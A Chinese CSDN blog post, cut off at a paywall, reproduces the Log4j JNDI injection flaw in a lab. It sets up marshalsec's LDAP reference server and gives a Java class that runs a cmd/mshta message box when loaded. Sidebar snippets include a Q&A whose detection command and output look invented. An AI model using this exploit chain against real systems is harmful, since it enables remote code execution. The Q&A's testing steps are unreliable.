log4j漏洞,jndi侵入验证复现

最新推荐文章于 2024-05-11 14:09:06 发布
最新推荐文章于 2024-05-11 14:09:06 发布
阅读量1.5k 收藏 4
点赞数 2
分类专栏: JAVA 文章标签: java 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36270700/article/details/121898146
版权

log4j的1.14.1往下版本

需要先搭建一个LDAP服务器,git地址

git clone https://github.com/mbechler/marshalsec.git

执行 marshalsec.jndi.LDAPRefServer 的main函数,idea添加执行命令

"http://127.0.0.1/fileService/download/1/1/#test" 8888

 意思是将文件服务器http://127.0.0.1/fileService/download/1/1/下面的test类,映射到8888端口

然后编写test类

public class test {
    static{
        try {
            Runtime.getRuntime().exec("cmd /c mshta vbscript:msgbox(\"有人从你的log4进来了\",64,\"来自熊猫头的消息\")(window.close)");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

test类执行了一个cmd指令,执行了一段vb程序语句

将他编译成class,放到文件服

最低0.47元/天 解锁文章
蔷薇思绪
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
log4j2_rce 项目
02-23
这是存在log4j jndi注入的项目,可以用idea编译,用网上工具一遍
LOG4J RCE 漏洞分享与自查.pdf
12-15
本文将详细介绍 Log4j RCE 漏洞的成因、漏洞、检测方法和解决方案。 漏洞原因: Log4j RCE 漏洞是由于 Log4j2 2.10.0 版本中的 Lookup 模块存在的漏洞。Lookup 模块允许用户在日志格式字符串中插入变量,从而...
log4j2 jndi注入漏洞
朴实,坚持,兴趣
12-12 9976
log4j2 jndi注入漏洞
Java最新Log4j2的JNDI注入漏洞原理分析与思考,2024最新华为Java校招面试题
最新发布
2401_84024497的博客
05-11 648
我们总是喜欢瞻仰大厂的大神们,但实际上大神也不过凡人,与菜鸟程序员相比,也就多花了几分心思,如果你再不努力,差距也只会越来越大。实际上,作为程序员,丰富自己的知识储备,提升自己的知识深度和广度是很有必要的。
漏洞 -“核弹”漏洞-Log4j2 JNDI注入(CVE-2021-44228)
菜鸟的测试世界
05-07 953
漏洞被评为“核弹”级别,实在是log4j使用范围太广了,只要写java的,没几个没听过用过log4j吧。 漏洞原理 利用jndi的Lookup功能,实jndi注入命令执行 影响范围 log4j 2.0-beta9到2.15.0(1.* 版本不受影响) 环境 jdk: 1.8.0_181 log4j:2.14.1 OS:Win10 步骤 1. 创建一个springboot的工程,验证当前的log4j库是否存在漏洞。 能解析${}表达式的才存在漏洞,官网的log...
Log4j2JNDI注入漏洞测试
zhangxm_qz的博客
12-19 2976
文章目录漏洞概述代码测试防护办法 漏洞概述 log4j2版本 < log4j-2.15.0-rc2 可由JNDI注入实远程代码执行。 代码测试 测试环境 我这里采用jdk1.8 211 创建并发布RMI服务 创建maven项目并,增加两个类,如下: 代码分别如下: package testRMI.service; import com.sun.jndi.rmi.registry.ReferenceWrapper; import testRMI.service.IService; import t
封装JNDI操作LDAP服务器的工具类(1)
iteye_17276的博客
01-27 172
封装JNDI操作LDAP服务器的工具类(1) LDAP操作封装类 作者:廖武锋 MSN:liaowufeng1111@hotmail.com QQ:38773367 Email:moaihe1111@163.com 本人为作者原创,若转贴,请保留作者署名,谢谢! LDAP操作封装类  目标:使用者只需要会使用List,Map 数据结构,将对LDAP的操作进行封装 类:主要有三个类 1 Env类...
Log4j核弹级bug及解决方案
wangdakaiwandashuai的博客
12-14 1590
Log4j核弹级bug
JNDI&RMI&LDAP介绍+log4j分析
enhengzZ的博客
02-16 1530
JNDI JNDI是java Naming and Directory Interfac即java命名与目录接口 Naming是命名服务,Director指目录服务。 通过调用JNDI的API应用程序可以定位资源和其他程序对象。JNDI是Java EE的重要部分,,JNDI可访问的有的目录及服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA。 命名服务 对资源命名方便下次调用,Naming的资源要唯一,每一个资源绑定一个名字 目录服务 顾名思义,和计算机的文件系统很像,具体来说,dns就是一
log4j2.17.2
04-14
Log4j2漏洞(CVE-2021-44228)的本质在于,攻击者可以通过操纵日志输入,触发JNDI(Java Naming and Directory Interface)查询,进而执行任意远程代码。这个漏洞的严重性在于,它允许攻击者无需任何权限即可完全...
log4j远程执行漏洞,测试源码
12-22
2021年12月,研究人员发了一个允许任意代码执行的严重漏洞,它存在于Log4j 2的JNDI(Java Naming and Directory Interface)查找功能中。攻击者只需要在日志消息中插入特定的恶意格式字符串,就能触发远程代码执行...
log4j2漏洞检测工具
05-07
然而,在2021年12月初,研究人员发Log4j2的一个严重漏洞,允许攻击者通过注入JNDI(Java Naming and Directory Interface)链接来执行任意代码。由于Log4j2被广泛应用在各种软件和系统中,这个漏洞的影响范围非常...
虚拟ldap服务器,什么是LDAP,LDAP服务器是什么?
weixin_28989357的博客
08-13 736
从上述定义不难看出LDAP是一个目录,那么该目录是如何出,有什么用呢?在当今的信息世界,网络为人们提供了丰富的资源。随着网络资源的日益丰富,迫切需要一种能有效管理资源信息并利于检索查询的服务技术。目录服务技术随之产生。1.LDAP目录服务可以有效地解决众多网络服务的用户账户问题。2.LDAP目录服务规定了统一的身份信息数据库、身份认证机制和接口,实了资源和信息的统一管理,保证了数据的一致性和完...
封装JNDI操作LDAP服务器的工具类2
weixin_33948416的博客
07-02 364
packagecom.common.ldapconnection; importjava.util.Properties; importjavax.naming.Context; importjavax.naming.NamingException; importjavax.naming.directory.DirContext; importjava...
log4j关于JNDI注入漏洞验证及修
影子的博客
12-11 7531
log4j关于JNDI注入漏洞验证及修一、漏洞说明二、漏洞检测方案三、影响范围四、影响组件五、彻底解决方案六、临时缓解方案七、漏洞八、本地编译log4j-2.15.0-rc版本方法1、下载源码2、安装JDK8、9、11。3、用idea打开源码4、修改toolchains-sample-win.xml文件的JDK安装路径5、修改maven的conf目录下的toolchains.xml文件,设置java11的安装路径6、编译安装到本地仓库 一、漏洞说明 漏洞原理官方表述:Apache Log4j2 中存在
Java日志:log4j JNDI漏洞分析
Yal_insist的博客
04-16 1103
Java日志:log4j JNDI漏洞分析
封装JNDI操作LDAP服务器的工具类(3)
AresYM
07-18 93
[code="java"] package com.common.ldapconnection; import java.util.List; import java.util.Vector; /** * * 功能描述:ldap的处理类,提供了各种操作ldap的方法。 * @author liaowufeng * @version 1.0 */ ...
扩展Log4j支持JNDI数据源
weixin_33816821的博客
04-04 283
log4j.properties配置文件: log4j.rootLogger=INFO,db #使用log4j扩展支持JNDI数据源 log4j.appender.db=com.qdgswx.log4j.ds.JndiDSAppender log4j.appender.db.jndiName=wstjndi log4j.appender.db.BufferSize=1 log4...
log4j漏洞测试步骤
08-05
### 回答1: log4j漏洞是指Apache Log4j 2.x版本中的一个严重安全漏洞(CVE-2021-44228),攻击者可以利用该漏洞在受影响的应用程序中执行任意代码,导致系统被入侵、数据泄露等问题。为了测试是否受到该漏洞的影响,可以按照以下步骤进行测试: 1. 确认应用程序使用了Log4j 2.x版本,可以在应用程序的pom.xml或gradle文件中查看相关依赖。 2. 使用以下命令检查是否受到漏洞影响: ``` java -jar log4j-core-2.16.0.jar "dns:[YOUR_DOMAIN_NAME]" -t ``` 其中,将 "dns:[YOUR_DOMAIN_NAME]" 替换为你的域名。如果应用程序受到漏洞影响,会返回一串类似于以下的信息: ``` 2021-12-09 11:54:45,784 main ERROR Unable to invoke factory method in class class org.apache.logging.log4j.core.appender.SocketAppender for element Socket. java.lang.IllegalArgumentException: hostname can't be null ``` 3. 如果测试结果表明应用程序受到漏洞影响,需要及时升级Log4j版本,可以升级到2.16.0及以上版本,或者安装补丁程序进行修。 4. 在升级或修之前,可以采取临时措施来缓解漏洞影响,例如在应用程序的配置文件中添加以下内容: ``` log4j2.formatMsgNoLookups=true ``` 这个设置将禁止Log4j使用JNDI和相关的Lookups功能,可以避免漏洞被利用。 总之,及时升级Log4j版本是防范该漏洞的最好方法。在升级之前,需要进行测试以确保应用程序是否受到漏洞影响。 ### 回答2: log4j漏洞测试步骤主要包括以下几个方面: 1. 确认应用是否使用log4j:首先,需要确认应用程序是否使用了log4j作为日志记录工具。可以查看应用程序的配置文件、代码库或者查找特定的log4j依赖包以确认。 2. 判断应用程序是否受到漏洞的影响:根据所使用的log4j版本,判断应用程序是否受到漏洞的影响。可以查看log4j的版本号以及是否包含漏洞的补丁。 3. 模拟攻击向量进行测试:通过构造恶意的日志记录,例如含有特殊的JNDI注入代码或者远程代码执行代码的日志信息,然后观察应用程序的日志记录文件是否产生了相应的远程连接或者执行迹象来判断应用程序是否受到漏洞的影响。 4. 检测应用程序的安全措施:测试应用程序的防御措施,例如应用程序是否进行了日志记录的合理限制,以及是否禁止了远程日志记录功能等。 5. 进行漏洞并进行测试:如果应用程序受到log4j漏洞的影响,建议及时更新至最新版本的log4j,并对修后的应用程序进行重新测试,确认漏洞是否已成功修。 需要注意的是,在进行log4j漏洞测试时,应确保在合适的测试环境下进行,避免对生产环境或者正式运行的应用程序造成不必要的损失。同时,建议遵循合规和法规要求,避免违规的安全测试行为。 ### 回答3: log4j漏洞测试是为了检测和验证系统中是否存在log4j漏洞,以下是一种常见的log4j漏洞测试步骤: 1. 查看系统中是否使用了log4j:首先,我们需要确认系统是否使用了log4j作为日志记录框架。可以查看系统代码或者依赖项中是否有log4j的相关信息。 2. 确认log4j版本:确定系统中使用的log4j版本,因为漏洞主要存在于log4j 2.x的版本中。可以检查相关代码或者依赖项的pom.xml文件中是否包含log4j的版本信息。 3. 下载并编译恶意代码:根据确认的log4j版本,从官方或者其他可信源下载相应版本的log4j漏洞代码。然后通过编译将恶意代码生成可执行的payload。 4. 部署恶意代码:将生成的恶意代码部署到目标系统中,可以是通过常规的软件部署方法,也可以通过代码注入等方式。 5. 触发恶意代码:根据恶意代码的具体设计和用途,触发恶意代码的执行。可以通过发送特定请求、调用特定接口或者模拟用户操作等方式触发。 6. 监测日志记录行为:观察系统的日志记录行为,包括日志文件的生成、内容的变化等。查看是否有漏洞利用的迹象,如恶意请求被记录等。 7. 上报并修漏洞:一旦发系统受到log4j漏洞的影响,应立即上报给相关安全人员,并尽快采取修措施,如升级log4j到最新版本、修改配置文件等。 需要注意的是,测试时应遵守法律法规和组织规定,合法授权并仔细评估测试的风险和影响。此外,建议在测试之前先创建备份,并在安全环境中进行测试以减少风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值